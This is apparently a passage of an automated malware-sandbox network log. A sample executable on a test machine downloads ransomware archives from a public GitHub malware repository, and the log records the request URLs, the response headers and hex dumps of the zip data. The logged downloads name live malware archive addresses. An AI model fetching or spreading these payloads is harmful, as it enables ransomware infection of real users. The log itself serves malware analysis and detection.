                                                                                                                                                2022-09-29 12:51:25 UTC2361INData Raw: 08 86 b9 42 95 71 31 15 40 85 43 c7 6b f3 df 62 2d 90 eb 9f 3f cc 07 bc 9f ea 03 eb 45 3e 67 9e ca f6 e4 69 9c de de 0d 51 82 ec cb da e0 11 43 f4 22 f8 c4 49 c7 59 d3 a5 24 14 7a a8 8d 1d b7 67 85 32 7d 6c 8d 9a de 10 70 4c c1 04 d5 cf 19 f3 f7 e8 85 a8 83 bb 8a 3d 14 8c 1a d9 73 f8 d2 e2 c5 a2 0f 4d 68 79 fc af c3 9f e3 c4 5d f3 90 3f b0 d1 34 ad 33 cd a1 1c 31 5c 5c 02 02 c2 fd 26 f3 e9 82 57 0c dd b2 b7 e7 47 a6 74 86 2e b4 99 22 29 25 2f ec 2a 17 01 ae 67 81 40 e8 24 dd 88 c3 8e 20 8c 56 97 f9 39 3e 31 26 b0 e9 19 b5 f5 73 02 b3 ac 04 dd 90 17 e0 63 dc 49 43 0e 57 86 b6 22 38 41 82 01 19 41 df 1a 9a 2f 22 4e 08 d3 92 8b 3e 51 2e 1d e0 b3 fc c3 21 f5 a0 3e 6b 75 49 85 3d b5 67 bf eb 18 56 14 3f 09 db 09 05 6b 0e 92 f1 fb 51 e6 da 75 89 51 80 3f ef 53
                                                                                                                                                Data Ascii: Bq1@Ckb-?E>giQC"IY$zg2}lpL=sMhy]?431\\&WGt.")%/*g@$ V9>1&scICW"8AA/"N>Q.!>kuI=gV?kQuQ?S


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                2192.168.2.549702140.82.121.3443C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:51:17 UTC396OUTGET /Endermanch/MalwareDatabase/raw/master/ransomwares/Birele.zip HTTP/1.1
                                                                                                                                                Host: github.com
                                                                                                                                                2022-09-29 12:51:17 UTC396INHTTP/1.1 302 Found
                                                                                                                                                Server: GitHub.com
                                                                                                                                                Date: Thu, 29 Sep 2022 12:51:11 GMT
                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/Birele.zip
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                X-Frame-Options: deny
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                                                2022-09-29 12:51:17 UTC397INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                20192.168.2.549720140.82.121.3443C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:51:25 UTC2365OUTGET /Endermanch/MalwareDatabase/raw/master/ransomwares/Winlocker.VB6.Blacksod.zip HTTP/1.1
                                                                                                                                                Host: github.com
                                                                                                                                                2022-09-29 12:51:25 UTC2365INHTTP/1.1 302 Found
                                                                                                                                                Server: GitHub.com
                                                                                                                                                Date: Thu, 29 Sep 2022 12:51:16 GMT
                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/Winlocker.VB6.Blacksod.zip
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                X-Frame-Options: deny
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                                                2022-09-29 12:51:25 UTC2365INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                21192.168.2.549721185.199.108.133443C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:51:25 UTC2367OUTGET /Endermanch/MalwareDatabase/master/ransomwares/Winlocker.VB6.Blacksod.zip HTTP/1.1
                                                                                                                                                Host: raw.githubusercontent.com
                                                                                                                                                2022-09-29 12:51:25 UTC2367INHTTP/1.1 200 OK
                                                                                                                                                Connection: close
                                                                                                                                                Content-Length: 1654828
                                                                                                                                                Cache-Control: max-age=300
                                                                                                                                                Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                Content-Type: application/zip
                                                                                                                                                ETag: "048f16ec26fac96976b1d3967107c01ab62f85a71c9ea224a0004e0d9a310bb0"
                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-Frame-Options: deny
                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                X-GitHub-Request-Id: 080E:67BF:7859E0:85F3A6:63359349
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Date: Thu, 29 Sep 2022 12:51:25 GMT
                                                                                                                                                Via: 1.1 varnish
                                                                                                                                                X-Served-By: cache-mxp6930-MXP
                                                                                                                                                X-Cache: HIT
                                                                                                                                                X-Cache-Hits: 1
                                                                                                                                                X-Timer: S1664455886.711762,VS0,VE104
                                                                                                                                                Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                X-Fastly-Request-ID: e10dc31bb9bb4ef434f423f7fb2044baf04accde
                                                                                                                                                Expires: Thu, 29 Sep 2022 12:56:25 GMT
                                                                                                                                                Source-Age: 0
                                                                                                                                                2022-09-29 12:51:25 UTC2368INData Raw: 50 4b 03 04 14 00 01 00 08 00 f3 be f1 48 70 46 04 a5 60 3f 19 00 a8 52 26 00 23 00 00 00 45 6e 64 65 72 6d 61 6e 63 68 40 57 69 6e 6c 6f 63 6b 65 72 56 42 36 42 6c 61 63 6b 73 6f 64 2e 65 78 65 13 82 84 12 45 39 75 df 15 b3 b4 e2 21 6a 25 fe e2 9e 52 e9 6c c4 4d 37 be 49 97 0a e4 f2 fd eb 82 6d 18 d5 dc f8 b7 12 1f da 01 13 ab a0 f2 8f d0 d0 78 27 00 cb db a6 6f d4 d9 32 0a f0 dc 60 ea bc 46 55 7d 13 2c c3 9a eb 73 98 44 49 93 e0 7c 6a 2c b3 7a 58 78 41 93 99 06 42 b1 7f 75 47 eb a4 a1 79 e6 80 ed 12 91 76 8a 64 fa 6a 78 eb ca c2 0b 70 df 58 a4 d6 63 ef 69 89 6c 2f 21 e9 cc b1 31 b4 cb 54 d9 00 5f de 7a 30 fd 13 6f 15 0f 9f 11 13 bb 23 ca 41 c6 c0 64 41 22 da 3b 27 45 e9 8b 13 90 51 e3 7f 46 e2 bc 4a 84 7f 16 f7 35 b5 58 21 8e 7e 6c 9b dd 9e a3 99 c4 07
                                                                                                                                                Data Ascii: PKHpF`?R&#Endermanch@WinlockerVB6Blacksod.exeE9u!j%RlM7Imx'o2`FU},sDI|j,zXxABuGyvdjxpXcil/!1T_z0o#AdA";'EQFJ5X!~l
                                                                                                                                                2022-09-29 12:51:25 UTC2369INData Raw: d2 d6 2d 7a ee 53 b3 b5 5d 3d 63 76 2b 69 a3 5e 09 f0 d7 14 a4 2a b2 51 17 ef 06 91 1b ca 3f 9b 86 16 be 8c 8c da 2d 1d c2 50 a1 a0 c9 57 bf ee a4 dc c0 e0 ed d0 b3 22 85 9e 1f b8 f8 77 5b 1c 7a f2 e5 3c 34 75 58 b9 02 92 76 f5 65 54 9d ed f2 1f 11 f0 4c d8 cc 4a 0c 14 7b 3f b9 f5 14 96 e1 d7 a3 b2 a9 3b 6e 6d 50 17 64 7f 23 38 76 cc de 2e a1 14 ed fa 71 1c a6 7f 6f 32 9f ab a9 1d dd ac 44 02 5d 0e 9a 6f 7a 9f 08 95 74 27 5d 68 0c 14 12 8e eb 3a b8 b7 50 44 47 57 6c cc 80 bd 83 9e c6 fd 9f 21 d2 ae 52 61 05 dd e5 cd 3d 48 b1 59 6c f6 8e c4 3c 8b 36 5e 8c ce da 29 df c3 51 e2 bc 3d 08 7a db eb 28 76 c6 a1 d1 76 f9 f7 ad 3f 78 d1 75 69 28 49 fc 94 c3 72 43 3d fe 25 b8 84 22 85 22 57 a3 a6 6d 6f d7 87 33 83 a1 c8 02 0b 9e 99 e8 79 86 c3 98 5c 00 02 c3 3f eb
                                                                                                                                                Data Ascii: -zS]=cv+i^*Q?-PW"w[z<4uXveTLJ{?;nmPd#8v.qo2D]ozt']h:PDGWl!Ra=HYl<6^)Q=z(vv?xui(IrC=%""Wmo3y\?
                                                                                                                                                2022-09-29 12:51:25 UTC2371INData Raw: f5 09 85 b0 c5 00 0b 7a be ed 06 08 70 d2 61 ef aa 31 03 53 80 bf 73 d2 be 55 9a 0a 41 f8 c6 79 f7 80 8f 0d 2b ec df 8b 72 fe 31 08 09 94 05 0f 2e c5 96 3e 61 23 cd 15 fb 9b ef 94 85 35 cd 30 24 39 f5 7c 09 03 d7 eb 3f c7 0c bc 6d 1f 3e 36 fd 56 c7 56 16 2e b3 b6 ed 3b a4 c3 30 86 c1 e2 e8 3b 23 64 5e b0 7f a7 e3 4a ab f3 d3 4e 80 cf 46 12 43 46 2d b8 fd 4b 13 6f d6 17 6a dd 74 bb 2c 9c c7 ff a1 ea df 1a b1 e0 c0 8a b0 a5 e8 fc 93 a4 14 b7 2a cd 19 89 5d c6 15 d5 34 62 73 9f 12 6a db 12 ad 84 89 56 52 b4 45 ed 95 0f c4 ba d9 e0 65 0d a3 59 bf aa 1f 73 09 f1 70 93 f6 a1 ab f3 b8 0f e1 34 19 97 12 5c f2 1e 83 99 a5 08 76 69 43 a8 d9 3c c6 cf 6c e1 d3 6b 99 cf 42 45 8e 6b 4a 1b 35 6d f2 c9 d6 d6 2c 04 ec 68 e0 f4 29 ff d4 c9 c3 26 eb 43 8e 6c d0 38 02 56 0e
                                                                                                                                                Data Ascii: zpa1SsUAy+r1.>a#50$9|?m>6VV.;0;#d^JNFCF-Kojt,*]4bsjVREeYsp4\viC<lkBEkJ5m,h)&Cl8V
                                                                                                                                                2022-09-29 12:51:25 UTC2372INData Raw: c2 0b 4c a0 b1 38 4a f2 fb cd 27 40 9a c8 30 e7 1a 7f aa 0e 37 f4 aa f9 56 f3 aa 77 83 c8 99 fd 26 fd 1b fe bd 1d 03 82 ee b3 af 06 65 c0 42 30 b5 a6 89 fa 29 b1 3c 62 76 eb 82 e2 32 a7 e8 5b 27 1f 4b 8a 2f 80 0e d1 e5 f5 ac 80 9c 27 ca 59 f2 09 69 81 85 2f 7d d1 4d 5b da a4 c4 cc df e8 d3 fc ad 9a 1f c3 22 de c4 03 c6 cb dc 17 e4 ab 57 c1 1b 03 93 87 18 c8 91 98 e4 8b 18 6e 6c 16 6c e4 f7 cf 67 39 5e 49 db d8 02 f5 75 24 50 88 8a 07 8f 71 a7 34 28 14 4a 20 b2 5c 64 99 19 0c cb 9b 4e 7a cd ad 69 80 6c 29 92 cf 22 14 34 a1 c2 5a da 34 ba a8 0f f0 5b 24 2f b4 82 62 bf e4 1c 84 4f 44 94 ac a7 76 94 92 78 87 35 6e 25 04 85 c8 f2 af 57 a3 b0 fd 81 47 52 ac ce c5 33 1f 69 61 1d 31 14 63 32 3e f0 5c c3 a0 b9 02 a2 c9 02 35 52 3a 53 5c 56 cb e9 f9 fa 59 de e8 b8
                                                                                                                                                Data Ascii: L8J'@07Vw&eB0)<bv2['K/'Yi/}M["Wnllg9^Iu$Pq4(J \dNzil)"4Z4[$/bODvx5n%WGR3ia1c2>\5R:S\VY
                                                                                                                                                2022-09-29 12:51:25 UTC2374INData Raw: d2 05 df c1 45 89 24 04 84 e7 4c 3a 57 9f d9 5b 7e e1 2e 2e b0 98 b1 59 df fc 9c d4 c1 2f 3f c0 ec e6 e8 e9 33 4a a1 87 40 bc 36 bb ed dd cf 16 ec fe a2 54 d6 75 28 c0 c3 5a 3c 69 dc ad a5 2f 3e c3 a2 a3 1b 69 9f 22 1e 07 c2 26 18 95 5e 4b 66 b1 5d 95 a1 6c db b2 7c da dc 78 cd 3c 24 df 95 83 ad ef 7e bb 46 1e 40 5b 26 30 3e 4f fa c6 d6 c7 d0 5a a4 80 9c d1 4f 57 df 18 a3 8d 6e 1a 45 9d fc 52 92 fb f9 55 0b 37 19 c0 26 84 a4 52 82 e5 55 57 ba 75 48 ca 50 56 6f 13 6d f9 f7 b9 04 ac ec 21 41 cb 39 ee 69 4c 1d 95 84 8c 48 08 b5 aa 8b e7 c6 68 01 fa 90 78 33 0e 2f 17 77 4a a1 3d 4d f8 8d 06 dc ee 1e 27 70 54 ab 91 a1 12 77 ad ec 45 f8 26 26 f5 a4 5a c1 1b 48 a0 6b 6c 3a 06 bf 35 e4 33 97 5a f0 05 c4 82 82 03 b3 20 6a ef dd 41 6a d6 31 ee de 9a 3d eb de 7b 24
                                                                                                                                                Data Ascii: E$L:W[~..Y/?3J@6Tu(Z<i/>i"&^Kf]l|x<$~F@[&0>OZOWnERU7&RUWuHPVom!A9iLHhx3/wJ=M'pTwE&&ZHkl:53Z jAj1={$
                                                                                                                                                2022-09-29 12:51:25 UTC2375INData Raw: e5 86 18 a7 17 80 14 10 6c 87 e1 d2 0b 1b 7a 1f 13 73 29 cd f8 d8 7f 6d 60 74 d2 f0 41 c2 eb 82 77 5d d0 b9 48 36 cc 23 92 e6 53 74 8c 4b f6 f6 93 5e f9 b4 ca 6e dc 01 dd 0b cc 00 8e 48 19 93 1d 89 b1 9a 5d b7 45 ba b5 7a 84 81 3b a9 06 b2 83 82 4e 15 8e 06 48 30 1b 9d 01 62 19 91 0a a4 6d 91 e8 b7 e8 de bd 94 68 f1 b3 d9 6d 43 b0 a2 3f 9a d4 15 df b8 75 7d 13 c3 2d c5 eb 0d 2f 10 63 3d ef 73 7e 0f 32 3b 3b fd bf b1 b1 76 bd f3 b0 16 22 7f 65 83 e5 49 47 cc fb 18 77 20 32 44 81 75 05 80 64 51 2b c6 80 c4 b3 e5 05 75 da b5 83 ef 18 24 98 24 cd e4 b0 34 78 2b be 8b ef 0c e2 26 e6 18 05 03 2c d3 f9 39 6d 82 4f 16 ed 57 5d be a2 2a fc db 97 9d ad 5b 9d 79 29 81 93 22 ef c5 2a 86 b9 4a 37 9d cb dc b6 58 0d 36 9a bf 86 35 28 7b 56 c9 73 2e 56 cc 5f af aa a5 2f
                                                                                                                                                Data Ascii: lzs)m`tAw]H6#StK^nH]Ez;NH0bmhmC?u}-/c=s~2;;v"eIGw 2DudQ+u$$4x+&,9mOW]*[y)"*J7X65({Vs.V_/
                                                                                                                                                2022-09-29 12:51:25 UTC2376INData Raw: 77 cd 30 f1 df f1 13 75 bf 0b 2b 88 28 86 3e 72 eb 75 4b 1a 41 fe d5 a4 18 68 6e e7 66 86 05 36 14 b6 ec 4e b8 d1 f5 cd 8c 94 31 3b 16 74 f3 78 1f 8b cc 07 15 05 e7 82 7b e0 9f 26 e5 44 5c ff aa 46 c7 d7 ce b7 8a 0e 6c e2 57 0d 45 62 d7 62 d6 b1 5d a8 e6 5d ac 66 f0 03 94 3d 69 db c0 a3 48 b6 06 4c e9 3d f7 50 6b 5f a2 fb 7d f5 4d 26 1e cf be a0 7b fa 22 77 10 bd 6d 18 fd df 82 23 36 a1 15 b2 97 56 d6 39 3f b7 ee 21 49 5f b0 4c 2f 83 56 d7 28 3a cc 87 4e bb d9 98 13 1b d8 53 d6 2a b8 28 66 07 f2 8f 09 07 00 e3 fa 8c 34 a8 79 4a ae 2a 64 77 17 e5 13 0c 7e 47 af 86 06 2c 3b 10 5f 55 8e 2d bb 67 ed a6 9b 76 22 bb 93 24 26 ee 28 1a 12 ce 48 f3 1c ea b1 d7 4a d6 5f 04 b0 85 2a be 8a 85 98 40 7f 4c c4 eb 22 06 18 d4 0a 26 0b bc 70 ec 57 c1 18 9f f5 ee ad d0 f3
                                                                                                                                                Data Ascii: w0u+(>ruKAhnf6N1;tx{&D\FlWEbb]]f=iHL=Pk_}M&{"wm#6V9?!I_L/V(:NS*(f4yJ*dw~G,;_U-gv"$&(HJ_*@L"&pW
                                                                                                                                                2022-09-29 12:51:25 UTC2378INData Raw: 6c e6 bd 78 f8 7a ff b3 8e 4d 2e 14 92 c8 8a 2e 05 c0 47 73 b7 37 4d c9 17 fe 09 ff 9a 98 9d ab 07 4b 43 65 95 5c d5 7d bc b9 1b 68 9e 9a 28 b4 7d 7b dd 90 1e 12 00 9d 3b f2 e6 da 6d 95 2a 00 6a 99 0c 8e 28 d1 b5 c4 fe f3 ad 90 a7 55 79 5d 0d 8c 6d fe 24 a7 2d 54 48 80 82 6c 31 e5 d4 e9 e7 9a d8 5b 2c c8 a4 e0 b7 16 25 e2 24 98 f7 57 05 25 e3 14 38 db 0c 39 79 d0 a8 6a dc 29 ec 0a be b2 0c 7d a6 bf 33 b1 cb 9d d6 79 8e 47 e1 14 76 0e a7 1d 7f 4b f2 9c 62 09 e3 45 50 ec 00 40 2b 7e a4 87 2d aa 84 be 4a b7 77 4c 59 ec 10 f7 32 d3 2c d6 1a 60 31 01 c1 c3 e1 a5 c1 64 21 f7 61 12 70 ed 6a fd 7a d4 c5 16 ed 8b 08 d8 bc 78 70 7e 09 a2 d6 f0 ab 8b 71 21 60 f1 1d bd c8 61 c2 1b 60 06 80 08 af e5 9c 03 ef 89 c9 98 f7 0f 3e 2f 84 06 c8 55 d7 a5 20 eb c7 13 10 f2 6c
                                                                                                                                                Data Ascii: lxzM..Gs7MKCe\}h(}{;m*j(Uy]m$-THl1[,%$W%89yj)}3yGvKbEP@+~-JwLY2,`1d!apjzxp~q!`a`>/U l
                                                                                                                                                2022-09-29 12:51:25 UTC2379INData Raw: 0d cd 76 50 cd 19 b5 30 e5 45 1d 08 78 83 34 5f 20 5d 1b 4f 8d 3b 6d 95 0c 00 0e 74 8f 7f 68 8b 30 1d 6b 66 d6 ab d5 4d 3a 23 a6 4f ad 97 bd 03 dd 88 bc 0f 67 ad 4f e4 48 9d 6b 5a 52 6c 85 04 93 dd 84 e4 b2 8b 7a 12 ad 01 58 f5 e9 92 ac 72 3c 43 a5 d9 87 8d 43 e8 4f 97 bf d0 e9 3e 3c 57 aa 44 42 fe 2f 2e d4 bb fb cf 99 81 0d 98 19 05 86 63 8c 81 ac 97 d4 76 07 9d 3a 6f f6 69 35 d8 49 e9 d9 d4 f8 c2 5f c8 0e 34 27 86 3d 33 84 23 cb 7f cb f6 05 96 3b a5 9e 79 71 c4 db 11 19 92 af e3 c4 25 5e 08 22 db 62 41 4c 69 76 e6 0d 9d c7 c7 36 ce 24 3b 6f 20 6f f4 e2 39 25 2c d3 1b b9 be f1 11 fe 60 32 b1 5f c7 c8 aa 03 ed 0a 37 da 81 4f 30 b3 72 aa b9 ef 94 74 bd 84 22 cd 80 d5 48 04 9e ba d1 f6 50 79 6c 6b e6 ae 2b a2 6a 4b 64 b5 c9 0b e0 8f 24 df 0c 14 76 b3 af df
                                                                                                                                                Data Ascii: vP0Ex4_ ]O;mth0kfM:#OgOHkZRlzXr<CCO><WDB/.cv:oi5I_4'=3#;yq%^"bALiv6$;o o9%,`2_7O0rt"HPylk+jKd$v
                                                                                                                                                2022-09-29 12:51:25 UTC2380INData Raw: c3 08 00 82 42 38 28 f6 59 90 d4 df 59 b2 52 fa 80 33 9e 7d 88 9d de 94 a6 d5 a3 27 46 6f b7 19 c7 00 57 2a 9c 83 2c 5c a8 5b 31 7d f6 57 64 a2 52 fb b5 af 50 73 84 66 b6 30 1d 85 9a b7 07 7d c9 16 1d 49 e2 d2 26 a1 33 47 19 12 57 07 56 50 dd 9d 97 de 00 35 03 45 ac aa 53 00 00 3b be 31 6d e7 0c 5e 5d f6 e7 49 b8 3c 14 49 a0 07 9a 8b 77 23 03 86 78 e3 0f e2 ef 57 e4 dd 3a 83 2c 59 90 fd 76 bf be 21 15 8b f0 01 3c 01 c4 d8 fe 2f 15 49 12 48 b6 ea ae df e6 2e 46 0f 43 d6 79 c6 e3 f8 4e 94 d8 63 af 88 5b e2 bb db 50 cb 9f 7f 97 9d 77 42 81 66 33 07 43 b3 52 5e 01 0b a8 b6 06 37 84 12 3b f4 ea 10 bd e1 d2 e6 bd 60 f7 6c 45 b6 8c 8e 19 b2 bc e9 56 b9 d9 d3 ef c3 4e a3 48 8b a6 7c 7b 99 a4 55 31 b5 d5 cf 47 93 d0 b3 7e 22 12 eb 10 39 da 4c 52 ca 1c f1 31 80 27
                                                                                                                                                Data Ascii: B8(YYR3}'FoW*,\[1}WdRPsf0}I&3GWVP5ES;1m^]I<Iw#xW:,Yv!</IH.FCyNc[PwBf3CR^7;`lEVNH|{U1G~"9LR1'
                                                                                                                                                2022-09-29 12:51:25 UTC2382INData Raw: dc 92 73 ef 55 67 61 94 18 39 af d6 a4 29 e1 dd 56 e1 c4 8e 71 e0 3d 64 fd ec a2 b4 ff 83 1c ff cb 18 ad fb a8 b6 46 ee 84 83 75 3f ac 77 bf 18 23 ba 5a 9b 59 59 af 0b f0 55 f9 67 80 ce 90 ed f4 08 5b 7f d0 52 42 f0 07 06 80 19 d7 0d 94 0f d0 00 b2 91 0c 09 35 96 2f 75 6e 2f 87 c7 92 ab 19 3e 07 62 7f f4 d2 4e cf 7a 89 ce 69 34 42 ae 38 e3 ff bb 3c f2 a7 a1 3f 96 29 8b 2c 1c 75 45 49 e7 62 4f 25 ac cb e2 84 a3 24 30 b4 8a 3d 62 8c 12 1b 91 6f ad 44 9f 4a 93 b6 46 a1 73 1c 95 0a 46 ff 6d 57 98 37 99 1c 29 69 5b d0 15 a4 65 77 1f a0 23 22 6c 26 0c 2a af 1f bf 0c 3d d8 5e 3c 3a fd 60 82 37 82 ff 96 04 87 5f 38 ea 1d 8d ae f9 eb 9c c7 28 f3 4f 4c 04 98 10 83 88 62 08 56 8f d9 1a a1 26 39 fa 40 ce dd 6e 39 d0 03 03 51 1e c7 eb 08 39 68 ee 0c 1c 38 e2 31 5c 69
                                                                                                                                                Data Ascii: sUga9)Vq=dFu?w#ZYYUg[RB5/un/>bNzi4B8<?),uEIbO%$0=boDJFsFmW7)i[ew#"l&*=^<:`7_8(OLbV&9@n9Q9h81\i
                                                                                                                                                2022-09-29 12:51:25 UTC2383INData Raw: 5c ea 4b c6 a3 6b 43 28 b7 46 ab a0 24 b4 be df 6f be 56 a5 33 d9 0b 6b 89 18 7b 79 3a 6a fb a3 4e 7a 56 d3 f0 52 28 b2 0c 16 1b 2b 98 29 2c fd 46 7a 0c bf 91 51 8a 2b 14 d4 8d 4b 90 0a ad 92 05 25 e8 7f 65 e7 f1 4a d6 d4 93 89 e1 a1 0d 44 c7 21 39 31 18 7a e6 f9 41 e0 23 5c 10 d6 47 05 f5 96 f7 60 6c c8 8e 95 33 79 54 2f 86 46 ec 05 ee 4c c3 fd 12 4a a8 39 79 a5 c5 cd 64 ba db 70 6b da f1 79 81 a9 69 1a 6a 2a de 5c eb f0 c9 39 90 0b 9b 81 ab 95 93 cc d7 db 6d 4f 59 6f 67 b3 4d 18 59 f4 d8 42 58 86 67 02 08 6b 12 d7 82 b3 71 66 92 82 d1 8f 1c 21 d5 1e 5b ec 9b 22 9b 28 2c 16 b2 49 f3 32 05 88 77 28 c3 14 f4 f0 2c c9 4c fc 83 d0 45 ba 24 ab 01 28 d9 00 cd 79 8e 97 3c 1f 58 84 1c bc 18 55 d6 48 cc d1 e8 e0 19 92 1f 1b 2f 50 07 95 34 ff a3 24 cc dd df c2 78
                                                                                                                                                Data Ascii: \KkC(F$oV3k{y:jNzVR(+),FzQ+K%eJD!91zA#\G`l3yT/FLJ9ydpkyij*\9mOYogMYBXgkqf!["(,I2w(,LE$(y<XUH/P4$x
                                                                                                                                                2022-09-29 12:51:25 UTC2383INData Raw: 36 05 2e 60 6f d4 c4 a1 5d bb 0a 68 a8 a9 19 e3 c5 75 31 4e 83 4c 20 2c 9c 1b 64 26 30 df 3e 2c b5 dc d5 08 ad c1 11 6a df de 8d 2a 40 7a 95 86 bb 8f 46 40 c7 5f ab 1d 87 06 f1 ef 35 69 9d 38 9d 84 06 4d 25 05 cd 47 55 b3 f3 cd 48 e7 48 30 9b 18 2d b2 53 ac d0 75 5d a2 fa 0e 6e e2 f5 0e c1 55 e5 2d b2 77 f2 83 ab 2b 12 d2 37 1e 1f cd f8 f6 30 f8 8d 2a 9a 58 ad 15 55 be 7b ef 65 0e 18 73 eb 2a c3 2e 7e 27 2a 79 09 63 36 37 63 cd 2e 49 b6 f1 6e 94 84 ef d6 b0 76 2e f2 ba 0d 05 6a 7a a8 98 53 7d c6 95 fe 44 8a 40 1b a7 78 ea fd 31 38 84 fc 3b 9d 91 ae 00 5e 30 db 90 14 7e a1 e8 b2 4e 3f 8f 19 5e f9 bb 96 61 66 1c e6 76 1a 68 60 f7 5f f9 c4 a3 23 e0 fc 27 e2 3a cc ff 04 04 96 63 2e 40 b4 d8 10 a0 50 e4 c5 69 4c 42 8c cf c2 bb 81 a2 ef ff 15 d7 22 59 8c 4a a4
                                                                                                                                                Data Ascii: 6.`o]hu1NL ,d&0>,j*@zF@_5i8M%GUHH0-Su]nU-w+70*XU{es*.~'*yc67c.Inv.jzS}D@x18;^0~N?^afvh`_#':c.@PiLB"YJ
